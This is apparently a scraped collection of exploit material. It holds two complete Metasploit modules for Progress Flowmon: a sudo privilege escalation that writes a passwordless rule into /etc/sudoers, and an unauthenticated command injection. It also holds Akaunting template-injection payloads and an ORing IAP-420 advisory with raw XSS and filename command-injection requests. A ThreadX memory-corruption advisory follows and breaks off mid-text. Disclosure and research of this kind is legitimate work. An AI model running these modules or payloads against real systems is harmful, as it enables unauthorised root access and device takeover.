##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local privilege escalation on Progress Flowmon.
#
# Per the module description, Flowmon's sudo configuration lets certain
# commands elevate based on their file name; one of them is a PHP invocation
# of /var/www/shtml/index.php. #exploit overwrites that file with a PHP
# snippet that appends a NOPASSWD rule for the ADMINS group to /etc/sudoers,
# triggers it through sudo, then runs the dropped payload via sudo as well.
# #on_new_session removes the sudoers line again and #cleanup restores the
# original index.php contents.
#
# Host artefacts this leaves (see 'SideEffects' below): a rewritten
# /var/www/shtml/index.php, the line 'ADMINS ALL=(ALL) NOPASSWD: ALL' in
# /etc/sudoers for the lifetime of the run, and a hidden executable under
# WRITABLE_DIR.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Post::File

  # Runs #check first and aborts the exploit unless the host looks like Flowmon.
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Progress Flowmon Local sudo privilege escalation',
        'Description' => %q{
          This module abuses a feature of the sudo command on Progress Flowmon.
          Certain binary files are allowed to automatically elevate
          with the sudo command. This is based off of the file name. This
          includes executing a PHP command with a specific file name. If the
          file is overwritten with PHP code it can be used to elevate privileges
          to root. Progress Flowmon up to at least version 12.3.5 is vulnerable.
        },
        'Author' => [
          'Dave Yesland with Rhino Security Labs',
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/'],
          ['URL', 'https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability']
        ],
        'DisclosureDate' => '2024-03-19',
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],
          'Reliability' => [ REPEATABLE_SESSION ]
        },
        'SessionTypes' => ['shell', 'meterpreter'],
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_X86, ARCH_X64],
        'Targets' => [['Automatic', {}]],
        'Privileged' => true
      )
    )
    register_options([
      OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ]),
    ])
  end

  # Fingerprints the host by counting Flowmon web-root indicators.
  #
  # @return [CheckCode] Detected when at least one indicator is present,
  #   Safe otherwise. This never returns Vulnerable: no version is read and
  #   the sudo rule itself is not verified, so Detected only means "looks
  #   like a Flowmon install".
  def check
    score = 0
    score += 1 if read_file('/var/www/shtml/index.php')&.include?('FlowMon')
    score += 1 if read_file('/var/www/shtml/ui/manifest.json')&.include?('Flowmon Web Interface')
    score += 1 if exists?('/var/www/shtml/translate.php')
    vprint_status("Found #{score} indicators this is a Progress Flowmon product")
    return CheckCode::Detected if score > 0

    return CheckCode::Safe
  end

  # Framework callback for the new (elevated) payload session.
  #
  # Deletes the 'ADMINS ALL=(ALL) NOPASSWD: ALL' line that #exploit appended
  # to /etc/sudoers, using whichever command channel the session type offers.
  # Session types other than meterpreter/shell get no cleanup here.
  #
  # @param session [Msf::Session] the session that just opened
  def on_new_session(session)
    super
    print_status('Cleaning up addition to /etc/sudoers')
    if session.type.to_s.eql? 'meterpreter'
      session.sys.process.execute '/bin/sh', "-c \"sed -i '/^ADMINS ALL=(ALL) NOPASSWD: ALL$/d' /etc/sudoers\""
    elsif session.type.to_s.eql? 'shell'
      session.shell_command_token 'sed -i \'/^ADMINS ALL=(ALL) NOPASSWD: ALL$/d\' /etc/sudoers'
    end
  end

  # Restores /var/www/shtml/index.php from the copy saved in #exploit.
  #
  # Nothing is restored when the saved copy is blank — either #exploit bailed
  # out before reading the file, or read_file returned nothing, in which case
  # the overwritten file stays in place.
  # NOTE(review): removing the file and re-creating it with write_file may
  # give it a different owner/mode than the original had — confirm on target.
  def cleanup
    super
    unless @index_php_contents.blank?
      print_status('Restoring /var/www/shtml/index.php file contents...')
      file_rm('/var/www/shtml/index.php')
      write_file('/var/www/shtml/index.php', @index_php_contents)
    end
  end

  # Drops the payload, replaces index.php with the sudoers-modifying PHP
  # snippet, triggers it through the name-based sudo rule, then runs the
  # payload with sudo.
  #
  # Aborts via fail_with(Failure::BadConfig) when WRITABLE_DIR is not writable.
  def exploit
    # Reset first so #cleanup sees a defined (blank) value even if we fail early.
    @index_php_contents = ''
    fail_with(Failure::BadConfig, "#{datastore['WRITABLE_DIR']} is not writable") unless writable?(datastore['WRITABLE_DIR'])
    # Hidden, randomly named file; FileDropper removes it on cleanup.
    exploit_file = "#{datastore['WRITABLE_DIR']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"

    vprint_status("Saving payload as #{exploit_file}")
    write_file(exploit_file, generate_payload_exe)
    chmod(exploit_file)
    register_file_for_cleanup(exploit_file)
    # Keep the original so #cleanup can put it back after the overwrite below.
    @index_php_contents = read_file('/var/www/shtml/index.php')
    print_status('Overwriting /var/www/shtml/index.php with payload')
    cmd_exec('echo \'<?php system("echo \\"ADMINS ALL=(ALL) NOPASSWD: ALL\\" >> /etc/sudoers"); ?>\' > /var/www/shtml/index.php;')
    print_status('Executing sudo to elevate privileges')
    # The sudo rule keys on the php + index.php file name, so this runs the
    # snippet above as root and appends the NOPASSWD rule.
    cmd_exec('sudo /usr/bin/php /var/www/shtml/index.php Cli\\:AddNewSource s;')
    # Presumably the session user is in the ADMINS group and can now sudo
    # without a password — TODO confirm; the module does not verify this.
    cmd_exec("sudo '#{exploit_file}'")
  end
end
<pre><code># Exploit Title: Akaunting 3.1.8 - Client Side Template Injection CSTI<br /># Exploit Author: tmrswrr<br /># Date: 30/05/2024<br /># Vendor: https://akaunting.com/forum<br /># Software Link: https://akaunting.com/apps/crm<br /># Vulnerable Version(s): 3.1.8<br /><br /><br />1 ) Log in with admin credentials and go to: Currencies > New Currency<br /> https://127.0.0.1/Akaunting/1/settings/currencies<br />2 ) Enter the template injection payload {{ Object.keys(this) }} in the Name field<br />3 ) Save it<br />4 ) You will see the result:<br /> "_uid", "_isVue",<br /> "__v_skip", "_scope",<br /> "$options", "_renderProxy",<br /> "_self", "$parent",<br /> "$root", "$children",<br /> "$refs",<br /> <br /> > {{ this.$root.$data }}<br /> > "form": {},<br /> "bulk_action": {<br /> "path": "currencies",<br /> "count": "",<br /> "value": "*",<br /> "message": "",<br /> "type": "",<br /> "show": false,<br /> "modal": false,<br /> "loading": false,<br /> "selected": [],<br /> <br /> > {{ Object.keys(this._self) }}<br /> > "_uid",<br /> "_isVue",<br /> "__v_skip",<br /> "_scope",<br /> "$options",<br /> "_renderProxy",<br /> "_self",<br /> "$parent",<br /> "$root",<br /> "$children",<br /> "$refs",<br /><br /><br /><br /> > {{$on.constructor('alert(1)')()}}<br /> > You will see an alert box<br /><br />=======================================================================================<br /><br />1 ) Log in with admin credentials and go to: Items > New Item<br /> https://127.0.0.1/Akaunting/1/common/items<br />2 ) Enter the template injection payload {{7*7}} in the Name field, and random numbers for Sale and Purchase Price<br />3 ) Save it<br />4 ) You will see the result:<br /> 49<br /> <br /><br />====================================================================================<br /><br />1 ) Log in with admin credentials and go to: Settings > Taxes > New Tax<br /> https://127.0.0.1/Akaunting/1/settings/taxes/1/edit<br />2 ) Enter the template injection payload {{7*7}} in the Name field, and random numbers for Sale and Purchase Price<br />3 ) Save 
it<br />4 ) You will see the result:<br /> 49<br /> > {{'a'.toUpperCase()}}<br /> > A<br /> > {{'a'.concat('b')}}<br /> > ab<br />====================================================================================<br /><br /><br />1 ) Log in with admin credentials and go to: Banking > Transactions > New Income<br />https://127.0.0.1/Akaunting/1/banking/transactions/create?type=income<br />2 ) Enter the template injection payload {{7*7}} in the Description field<br />3 ) Save it<br />4 ) You will see the result:<br /> 49<br /> > {{'a'.toUpperCase()}}<br /> > A<br /> > {{'a'.concat('b')}}<br /> > ab<br /> <br />=======================================================================================<br /><br />1 ) Log in with admin credentials and open<br />https://127.0.0.1/Akaunting/1/purchases/vendors/1/edit<br />2 ) Enter the template injection payload {{7*7}} in the Name field<br />3 ) Save it<br />4 ) You will see the result:<br /> 49<br /> > {{'a'.toUpperCase()}}<br /> > A<br /> > {{'a'.concat('b')}}<br /> > ab<br /> > {{self}}<br /> > <br /><br /><br /> <br /> <br /><br /><br /></code></pre>
<pre><code># Exploit Title: Akaunting 3.1.8 - Server-Side Template Injection (SSTI)<br /># Exploit Author: tmrswrr<br /># Date: 30/05/2024<br /># Vendor: https://akaunting.com/forum<br /># Software Link: https://akaunting.com/apps/crm<br /># Vulnerable Version(s): 3.1.8<br /># Tested on: https://www.softaculous.com/apps/erp/Akaunting<br /><br /><br />1 ) Log in with admin credentials and go to: Items > New Item<br /> https://127.0.0.1/Akaunting/1/common/items<br />2 ) Enter the SSTI payload {{7*7}} in the Name field, and random numbers for Sale and Purchase Price<br />3 ) Save it<br />4 ) You will see the result:<br /> 49<br /> <br /><br />====================================================================================<br /><br />1 ) Log in with admin credentials and go to: Settings > Taxes > New Tax<br /> https://127.0.0.1/Akaunting/1/settings/taxes/1/edit<br />2 ) Enter the SSTI payload {{7*7}} in the Name field, and random numbers for Sale and Purchase Price<br />3 ) Save it<br />4 ) You will see the result:<br /> 49<br /> > {{'a'.toUpperCase()}}<br /> > A<br /> > {{'a'.concat('b')}}<br /> > ab<br />====================================================================================<br /><br /><br />1 ) Log in with admin credentials and go to: Banking > Transactions > New Income<br />https://127.0.0.1/Akaunting/1/banking/transactions/create?type=income<br />2 ) Enter the SSTI payload {{7*7}} in the Description field<br />3 ) Save it<br />4 ) You will see the result:<br /> 49<br /> > {{'a'.toUpperCase()}}<br /> > A<br /> > {{'a'.concat('b')}}<br /> > ab<br /> <br />=======================================================================================<br /><br />1 ) Log in with admin credentials and open<br />https://127.0.0.1/Akaunting/1/purchases/vendors/1/edit<br />2 ) Enter the SSTI payload {{7*7}} in the Name field<br />3 ) Save it<br />4 ) You will see the result:<br /> 49<br /> > {{'a'.toUpperCase()}}<br /> > A<br /> > {{'a'.concat('b')}}<br /> > ab<br /><br /><br /> <br /> <br /><br /><br /></code></pre>
<pre><code>CyberDanube Security Research 20240528-0<br />-------------------------------------------------------------------------------<br /> title| Multiple Vulnerabilities<br /> product| ORing IAP-420<br /> vulnerable version| 2.01e<br /> fixed version| -<br /> CVE number| CVE-2024-5410, CVE-2024-5411<br /> impact| High<br /> homepage| https://oringnet.com/<br /> found| 2024-01-19<br /> by| T. Weber (Office Vienna)<br /> | CyberDanube Security Research<br /> | Vienna | St. Pölten<br /> |<br /> | https://www.cyberdanube.com<br />-------------------------------------------------------------------------------<br /><br />Vendor description<br />-------------------------------------------------------------------------------<br />"Founded in 2005, ORing specializes in developing innovative own-branded<br />products for industrial settings. Over the years, ORing has accumulated<br />abundant experience in wired and wireless network communications industry. In<br />line with the commercialization of 5G, ORing has stretched its arm into the<br />IIoT field, helping customers realize all kinds of IIoT applications such as<br />smart manufacturing, smart city, and industrial automation. With high product<br />quality and best customer services in mind, ORing has continued to launch<br />cutting-edge products catering to customer needs. 
ORing's products have been<br />widely adopted in surveillance, rail transport, industrial automation, power<br />substations, renewable energy, and marine industries with offices worldwide to<br />address customer needs in real time."<br /><br />Source: https://oringnet.com/en/about-us/company-profile<br /><br /><br />Vulnerable versions<br />-------------------------------------------------------------------------------<br />IAP-420 / 2.01e<br /><br />Vulnerability overview<br />-------------------------------------------------------------------------------<br />1) Stored Cross-Site Scripting (CVE-2024-5410)<br />A Stored Cross-Site Scripting vulnerability was identified in the web interface<br />of the device. The SSID of the WiFi can be configured to contain arbitrary<br />JavaScript code. An attacker can exploit this vulnerability by luring a victim<br />to visit a malicious website. Furthermore, it is possible to hijack the session<br />of the attacked user.<br /><br /><br />2) Authenticated Command Injection (CVE-2024-5411)<br />The filename parameter of the config file upload is prone to a Command<br />Injection vulnerability. This vulnerability can only be exploited if a user is<br />authenticated to the web interface. This way, an attacker can invoke commands<br />and is able to get full control over the whole device.<br /><br /><br />Proof of Concept<br />-------------------------------------------------------------------------------<br />1) Stored Cross-Site Scripting (CVE-2024-5410)<br />Stored Cross-Site Scripting can be triggered by placing JavaScript code into<br />the SSID input field of the web interface as authenticated user. 
A single<br />request for injecting the script is shown below:<br />-------------------------------------------------------------------------------<br />POST /cgi-bin/wl_set.cgi HTTP/1.1<br />Host: 192.168.0.1<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 659<br />Connection: keep-alive<br />Cookie: auth=YWRtaW46YWRtaW4=<br />Upgrade-Insecure-Requests: 1<br /><br />sel_op_mode=client&sel_mssid=0&tf_ssid=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sel_isolation=0&<br />sel_mssid_isolation=0&sel_auth_mode=0&rb_wep_authmode=0&sel_wep_enc_bits=0&<br />sel_wep_key_type=0&tf_key1=&tf_key2=&tf_key3=&tf_key4=&rb_wpapsk_authmode=0&<br />rb_wpapsk_enc=0&tf_wpa_key=&rb_wpa_authmode=0&rb_wpa_enc=0&tf_ip1=&tf_ip2=&<br />tf_ip3=&tf_ip4=&tf_radius_port=&tf_radius_key=&tf_ip1_1x=&tf_ip2_1x=&<br />tf_ip3_1x=&tf_ip4_1x=&tf_radius_port_1x=&tf_radius_key_1x=&bt_save=Save&<br />lang=en&channel=0&isolation=0&mssid_isolation=0&auth_mode=0&wep_authmode=0&<br />wpapsk_authmode=0&wpa_authmode=0&wpa_enc_type=0&wep_enc_bits=0&wep_key_type=0&<br />wep_key_index=0&ret_msg=<br />-------------------------------------------------------------------------------<br /><br />2) Authenticated Command Injection (CVE-2024-5411)<br />A command can be injected in the filename of the uploaded config. 
By sending a<br />request as shown below, the content of the current directory can be shown:<br />-------------------------------------------------------------------------------<br />POST /cgi-bin/admin_config.cgi?todo=upconf HTTP/1.1<br />Host: 10.69.10.2<br />User-Agent: Mozilla/5.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------347087158737672164432057801583<br />Content-Length: 563<br />Connection: keep-alive<br />Cookie: auth=YWRtaW46YWRtaW4=<br />Upgrade-Insecure-Requests: 1<br /><br />-----------------------------347087158737672164432057801583<br />Content-Disposition: form-data; name="upfile"; filename="test.bin;ls${IFS}-la;"<br /><br /><br />-----------------------------347087158737672164432057801583<br />Content-Disposition: form-data; name="bt_upconf"<br /><br />Upload<br />-----------------------------347087158737672164432057801583<br />Content-Disposition: form-data; name="lang"<br /><br />en<br />-----------------------------347087158737672164432057801583<br />Content-Disposition: form-data; name="ret_msg_upconf"<br /><br /><br />-----------------------------347087158737672164432057801583--<br />-------------------------------------------------------------------------------<br />This request is equal to executing "ls -la" on the console of the device.<br /><br />-------------------------------------------------------------------------------<br />HTTP/1.0 200 OK<br />tar: can't open '/tmp/test.bin': No such file or directory<br />drwxr-xr-x 4 root root 1024 Mar 7 14:36 .<br />drwxr-xr-x 8 root root 1024 Jan 30 2024 ..<br />-rwxr-xr-x 1 root root 17572 Jan 30 2024 admin_config.cgi<br />-rwxr-xr-x 1 root root 17584 Jan 30 2024 admin_default.cgi<br />-rwxr-xr-x 1 root root 15984 Jan 30 2024 admin_fwup.cgi<br />-rwxr-xr-x 1 root root 12476 Jan 30 2024 
admin_password.cgi<br />-rwxr-xr-x 1 root root 13164 Jan 30 2024 admin_restart.cgi<br />-rwxr-xr-x 1 root root 33336 Jan 30 2024 adv_filters.cgi<br />-rwxr-xr-x 1 root root 15032 Jan 30 2024 adv_misc.cgi<br />-rwxr-xr-x 1 root root 72168 Jan 30 2024 adv_rstp.cgi<br />-rwxr-xr-x 1 root root 6588 Jan 30 2024 backup_unit.cgi<br />[...]<br />-------------------------------------------------------------------------------<br /><br />The vulnerabilities were manually verified on an emulated device by using the<br />MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).<br /><br /><br />Solution<br />-------------------------------------------------------------------------------<br />None<br /><br />Workaround<br />-------------------------------------------------------------------------------<br />None<br /><br />Recommendation<br />-------------------------------------------------------------------------------<br />CyberDanube recommends Oring customers to upgrade the firmware to the latest<br />version available and to restrict network access to the management interface of<br />the device.<br /><br /><br />Contact Timeline<br />-------------------------------------------------------------------------------<br />2024-02-06: Contacting ORing via support@oringnet.com. Automatic holiday reply.<br />2024-02-19: Asking for an update. No reply.<br />2024-02-28: Asking for an update. No reply.<br />2024-03-11: Searched for "cyber security manager" on LinkedIn. Contacted him<br /> and got the answer, that the content should be sent to<br /> "support@oringnet.com". Sent the advisory to this address directly.<br />2024-03-20: Asking for an update. No reply.<br />2024-04-10: Asking for an update. No reply.<br />2024-04-30: Including support_us@oringnet.com. Asking for an update. Added<br /> notification about responsible disclosure deadline. No reply.<br />2024-05-02: Including support_eu@oringnet.com. Asking for an update. 
Added<br /> notification about responsible disclosure deadline. No reply.<br />2024-05-27: Sent information that the advisory will be published on 2024-05-28.<br />2024-05-28: Public release of security advisory.<br /><br /><br />Web: https://www.cyberdanube.com<br />Twitter: https://twitter.com/cyberdanube<br />Mail: research at cyberdanube dot com<br /><br />EOF T. Weber / @2024<br /><br /></code></pre>
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Unauthenticated OS command injection in Progress Flowmon (CVE-2024-2389).
#
# The injection point is the pluginPath GET parameter of the
# service.pdfs/confluence endpoint. #execute_command wraps the payload in
# $(...), so the value is presumably handed to a shell on the server side —
# the handler itself is not visible here.
#
# From the server's point of view the exploit is a single GET to
# /service.pdfs/confluence whose pluginPath value contains '$(' (the
# IOC_IN_LOGS side effect declared below).
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # Runs #check first and aborts the exploit unless it reports Vulnerable.
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Flowmon Unauthenticated Command Injection',
        'Description' => %q{
          This module exploits an unauthenticated command injection vulnerability in Progress Flowmon
          versions before v12.03.02.
        },
        'Author' => [
          'Dave Yesland with Rhino Security Labs',
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-2389'],
          ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/'],
          ['URL', 'https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability']
        ],
        'DisclosureDate' => '2024-04-23',
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],
          'Reliability' => [ REPEATABLE_SESSION ]
        },
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD],
        'Targets' => [['Automatic', {}]],
        'Privileged' => false,
        'DefaultOptions' => {
          'SSL' => true,
          'RPORT' => 443
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'The URI path to Flowmon', '/'])
    ])
  end

  # Sends one GET request carrying cmd in the pluginPath parameter.
  #
  # 'file' and 'lang' are random filler; only pluginPath carries the
  # injection. Note this builds the path from datastore['TARGETURI'] while
  # #check goes through target_uri.path — equivalent for a plain path, but
  # using target_uri in both would be more consistent.
  #
  # @param cmd [String] command to run on the target
  # @return [Rex::Proto::Http::Response, nil] the response, or nil when the
  #   connection fails (see the nil handling in #check); callers ignore it
  def execute_command(cmd)
    send_request_cgi(
      'uri' => normalize_uri(datastore['TARGETURI'], 'service.pdfs', 'confluence'),
      'method' => 'GET',
      'vars_get' => {
        'file' => rand_text_alphanumeric(8),
        'lang' => rand_text_alphanumeric(8),
        'pluginPath' => "$(#{cmd})"
      }
    )
  end

  # Fires the ARCH_CMD payload through #execute_command.
  #
  # The HTTP response is not inspected; success is judged by whether a
  # session comes back. A payload that does not return presumably keeps the
  # request open until the HTTP timeout — confirm against the target.
  def exploit
    print_status('Attempting to execute payload...')
    execute_command(payload.encoded)
  end

  # Fingerprints the login page and compares the version embedded in the
  # favicon link against 12.03.02.
  #
  # @return [CheckCode] Unknown when the host does not answer or no version
  #   can be extracted; Safe when the page is not titled 'Flowmon Web
  #   Interface' or the version is newer than 12.03.02; Vulnerable otherwise.
  # NOTE(review): the Description says "before v12.03.02" but the comparison
  # below is <=, so 12.03.02 itself is reported vulnerable — confirm the
  # boundary against the vendor advisory and align the two.
  def check
    print_status("Checking if #{peer} can be exploited!")

    uri = normalize_uri(target_uri.path, 'homepage/auth/login')
    res = send_request_cgi(
      'uri' => uri,
      'method' => 'GET'
    )

    # send_request_cgi yields nil when no connection could be made.
    return CheckCode::Unknown('Connection failed') unless res
    # A missing <title> yields "" from .text and therefore Safe, not an error.
    return CheckCode::Safe('Target does not appear to be running Progress Flowmon') unless res.code == 200 && res.get_html_document.xpath('//title').text == 'Flowmon Web Interface'

    # Use a regular expression to extract the version number from the response
    version = res.body.match(%r{/favicon\.ico\?v=([\d.]+)})

    return CheckCode::Unknown('Unable to determine the version from the favicon link.') unless version && version[1]

    print_status("Detected version: #{version[1]}")

    if Rex::Version.new(version[1]) <= Rex::Version.new('12.03.02')
      CheckCode::Vulnerable("Version #{version[1]} is vulnerable.")
    else
      CheckCode::Safe("Version #{version[1]} is not vulnerable.")
    end
  end
end
<pre><code>--[ HNS-2024-06 - HN Security Advisory - https://security.humanativaspa.it/<br /><br />* Title: Multiple vulnerabilities in Eclipse ThreadX<br />* OS: Eclipse ThreadX < 6.4.0<br />* Author: Marco Ivaldi <marco.ivaldi@hnsecurity.it><br />* Date: 2024-05-28<br />* CVE IDs and severity:<br /> * CVE-2024-2214 - High - 7.0 - CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H<br /> * CVE-2024-2212 - High - 7.3 - CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L<br /> * CVE-2024-2452 - High - 7.0 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L<br />* Advisory URLs: <br /> * https://github.com/eclipse-threadx/threadx/security/advisories/GHSA-vmp6-qhp9-r66x<br /> * https://github.com/eclipse-threadx/threadx/security/advisories/GHSA-v9jj-7qjg-h6g6<br /> * https://github.com/eclipse-threadx/netxduo/security/advisories/GHSA-h963-7vhw-8rpx<br />* Vendor URL: https://threadx.io/<br /><br /><br />--[ 0 - Table of contents<br /><br />1 - Summary<br />2 - Background<br />3 - Vulnerabilities<br /> 3.1 - CVE-2024-2214 - Ineffective array size check and static buffer overflow in Eclipse ThreadX<br /> 3.2 - CVE-2024-2212 - Integer wraparounds, under-allocations, and heap buffer overflows in Eclipse ThreadX<br /> 3.3 - CVE-2024-2452 - Integer wraparound, under-allocation, and heap buffer overflow in Eclipse ThreadX NetX Duo<br /> 3.4 - Other bugs with potential security implications in Eclipse ThreadX NetX Duo and USBX<br />4 - Affected products<br />5 - Remediation<br />6 - Disclosure timeline<br />7 - Acknowledgments<br />8 - References<br /><br /><br />--[ 1 - Summary<br /><br />"Why don’t you pick on projects your own size, <br />quit tormenting the tiny ones!" <br /> -- The Grugq<br /><br />Azure RTOS was Microsoft's real-time operating system for IoT devices. At the<br />beginning of 2024, Microsoft contributed the Azure RTOS technology to the<br />Eclipse Foundation [1]. 
With the Eclipse Foundation as its new home, Azure RTOS<br />was rebranded as Eclipse ThreadX.<br /><br />Eclipse ThreadX is an advanced embedded development suite including a small but<br />powerful operating system that provides reliable, ultra-fast performance for<br />resource-constrained devices. It offers a vendor-neutral, open source, safety<br />certified OS for real-time applications, all under a permissive license. <br /><br />We reviewed ThreadX's source code hosted on GitHub [2] and identified multiple<br />security vulnerabilities that may cause memory corruption. Their impacts range<br />from denial of service to potential arbitrary code execution.<br /><br /><br />--[ 2 - Background<br /><br />Continuing our recent vulnerability research work in the IoT space [3] [4] [5],<br />we keep assisting open-source projects in finding and fixing vulnerabilities by<br />reviewing their source code. In December 2023, Azure RTOS, which one month<br />later was rebranded as Eclipse ThreadX, was selected as a target of interest.<br /><br />During the source code review, we made use of our Semgrep C/C++ ruleset [6] and<br />weggli pattern collection [7] to identify hotspots in code on which to focus<br />our attention.<br /><br /><br />--[ 3 - Vulnerabilities<br /><br />The vulnerabilities resulting from our source code review are briefly described<br />in the following sections.<br /><br /><br />--[ 3.1 - CVE-2024-2214 - Ineffective array size check and static buffer overflow in Eclipse ThreadX<br /><br />In Eclipse ThreadX before version 6.4.0, the `_Mtxinit()` function in the<br />Xtensa port was missing an array size check causing a memory overwrite.<br /><br />The vulnerability was spotted in the following file:<br />* /ports/xtensa/xcc/src/tx_clib_lock.c<br /><br />There was no error handling in case `lcnt` >= `XT_NUM_CLIB_LOCKS`. 
The program<br />would continue and the `tx_mutex_create()` would eventually corrupt memory by<br />writing outside the bounds of the `xclib_locks` static array:<br />```c<br />#ifdef TX_THREAD_SAFE_CLIB /* this file is only needed if using C lib */<br />...<br />#if XSHAL_CLIB == XTHAL_CLIB_XCLIB<br />...<br />static TX_MUTEX xclib_locks[XT_NUM_CLIB_LOCKS];<br />static uint32_t lcnt;<br />...<br />/**************************************************************************/<br />/* _Mtxinit - initialize a lock. Called once for each lock. */<br />/**************************************************************************/<br />void<br />_Mtxinit (_Rmtx * mtx)<br />{<br /> TX_MUTEX * lock;<br /><br /> if (lcnt >= XT_NUM_CLIB_LOCKS) { // VULN: empty if() body<br /> /* Fatal error */<br /> }<br /><br /> lock = &(xclib_locks[lcnt]);<br /> lcnt++;<br /><br /> /* See notes for newlib case below. */<br />#ifdef THREADX_TESTSUITE<br /> tx_mutex_create (lock, "Clib lock", 0);<br />#else<br /> tx_mutex_create (lock, "Clib lock", TX_INHERIT);<br />#endif<br /><br /> *mtx = lock;<br />}<br />```<br /><br />Fixes:<br />https://github.com/eclipse-threadx/threadx/pull/340<br /><br />See also:<br />https://github.com/eclipse-threadx/threadx/security/advisories/GHSA-vmp6-qhp9-r66x<br /><br /><br />--[ 3.2 - CVE-2024-2212 - Integer wraparounds, under-allocations, and heap buffer overflows in in Eclipse ThreadX<br /><br />In Eclipse ThreadX before version 6.4.0, functions `xQueueCreate()` and<br />`xQueueCreateSet()` from the FreeRTOS compatibility API were missing parameter<br />checks. 
This could lead to integer wraparound, under-allocations, and heap<br />buffer overflows.<br /><br />The vulnerabilities were spotted in the following file:<br />* /utility/rtos_compatibility_layers/FreeRTOS/tx_freertos.c<br /><br />If an attacker could control `uxQueueLength` or `uxItemSize`, they could cause<br />an integer wraparound thus causing `txfr_malloc()` to allocate a small amount<br />of memory, exposing to subsequent heap buffer overflows (AKA BadAlloc-style<br />memory corruption):<br />```c<br />QueueHandle_t xQueueCreate(UBaseType_t uxQueueLength, UBaseType_t uxItemSize)<br />{<br /> txfr_queue_t *p_queue;<br /> void *p_mem;<br /> size_t mem_size;<br /> UINT ret;<br /><br /> configASSERT(uxQueueLength != 0u);<br /> configASSERT(uxItemSize >= sizeof(UINT));<br /><br />#if (TX_FREERTOS_AUTO_INIT == 1)<br /> if(txfr_initialized != 1u) {<br /> tx_freertos_auto_init();<br /> }<br />#endif<br /><br /> p_queue = txfr_malloc(sizeof(txfr_queue_t));<br /> if(p_queue == NULL) {<br /> return NULL;<br /> }<br /><br /> mem_size = uxQueueLength*(uxItemSize);<br /><br /> p_mem = txfr_malloc(mem_size); // VULN: integer wraparound and under-allocation<br /> if(p_mem == NULL) {<br /> txfr_free(p_queue);<br /> return NULL;<br /> }<br /><br /> TX_MEMSET(p_mem, 0, mem_size);<br /> TX_MEMSET(p_queue, 0, sizeof(*p_queue));<br /> p_queue->allocated = 1u;<br /> p_queue->p_mem = p_mem;<br /> p_queue->id = TX_QUEUE_ID;<br /><br /> p_queue->p_write = (uint8_t *)p_mem;<br /> p_queue->p_read = (uint8_t *)p_mem;<br /> p_queue->msg_size = uxItemSize;<br /> p_queue->queue_length = uxQueueLength;<br /><br /> ret = tx_semaphore_create(&p_queue->read_sem, "", 0u);<br /> if(ret != TX_SUCCESS) {<br /> return NULL;<br /> }<br /><br /> ret = tx_semaphore_create(&p_queue->write_sem, "", uxQueueLength);<br /> if(ret != TX_SUCCESS) {<br /> return NULL;<br /> }<br /><br /> return p_queue;<br />}<br />```<br /><br />If an attacker could control `uxEventQueueLengthi`, they could cause an 
integer<br />wraparound thus causing `txfr_malloc()` to allocate a small amount of memory,<br />exposing to subsequent heap buffer overflows (AKA BadAlloc-style memory<br />corruption):<br />```c<br />QueueSetHandle_t xQueueCreateSet(const UBaseType_t uxEventQueueLength)<br />{<br /> txfr_queueset_t *p_set;<br /> void *p_mem;<br /> ULONG queue_size;<br /> UINT ret;<br /><br /> configASSERT(uxEventQueueLength != 0u);<br /><br />#if (TX_FREERTOS_AUTO_INIT == 1)<br /> if(txfr_initialized != 1u) {<br /> tx_freertos_auto_init();<br /> }<br />#endif<br /><br /> p_set = txfr_malloc(sizeof(txfr_queueset_t));<br /> if(p_set == NULL) {<br /> return NULL;<br /> }<br /><br /> queue_size = sizeof(void *) * uxEventQueueLength;<br /> p_mem = txfr_malloc(queue_size); // VULN: integer wraparound and under-allocation<br /> if(p_mem == NULL) {<br /> txfr_free(p_set);<br /> return NULL;<br /> }<br /><br /> ret = tx_queue_create(&p_set->queue, "", sizeof(void *) / sizeof(UINT), p_mem, queue_size);<br /> if(ret != TX_SUCCESS) {<br /> TX_FREERTOS_ASSERT_FAIL();<br /> return NULL;<br /> }<br /><br /> return p_set;<br />}<br />```<br /><br />These functions are part of an external API to be used by user's applications.<br />The values of those parameters passed to the vulnerable functions depend on<br />user's code.<br /><br />Fixes:<br 